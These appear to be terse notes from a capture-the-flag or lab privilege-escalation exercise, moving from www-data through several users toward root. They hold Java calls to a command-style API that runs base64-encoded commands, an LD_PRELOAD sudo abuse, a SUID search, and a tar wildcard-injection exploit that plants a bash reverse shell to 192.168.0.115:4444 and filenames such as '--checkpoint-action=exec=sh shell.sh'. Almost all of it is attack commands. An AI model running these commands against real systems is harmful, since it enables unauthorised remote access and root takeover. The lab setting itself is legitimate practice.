new CallAPI().execute("https://" + api_server + "/ping");
new CallAPI().execute("https://" + api_server + "/register/new", deviceId);
new CallAPI().execute("https://" + api_server + "/register/status/" + deviceId);
new CallAPI().execute("https://" + api_server + "/do/cmd/" + base64_command, deviceId, api_auth_token);

*www-date to robin
40373df4b7a1f413af61cf7fd06d03a565a51898
ssh -o StrictHostKeyChecking=no robin@IP -> ssh: connect to host 192.168.0.129 port 22: No route to host
ssh -o StrictHostKeyChecking=no robin@localhost (from shell www-data)
*robin to bryan
sudo -u bryan LD_PRELOAD=/tmp/pe.so /usr/local/bin/dic

*bryan to Sean
find / -perm -u=s -type f 2>/dev/null
-> /usr/local/bin/backup /usr/local/bin/restore
PATH=/usr/local/bin:/bin:/usr/bin:/usr/local/sbin:/usr/sbin; cd /usr/share/nginx/serverchecker/storage; /bin/tar -zvcf /home/sean/backup_$(/bin/date +"%Y%m%d").tar.gz *;
cd /usr/share/nginx/serverchecker/storage
echo "/bin/bash -i >& /dev/tcp/192.168.0.115/4444 0>&1" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
/usr/local/bin/backup

*sean to root

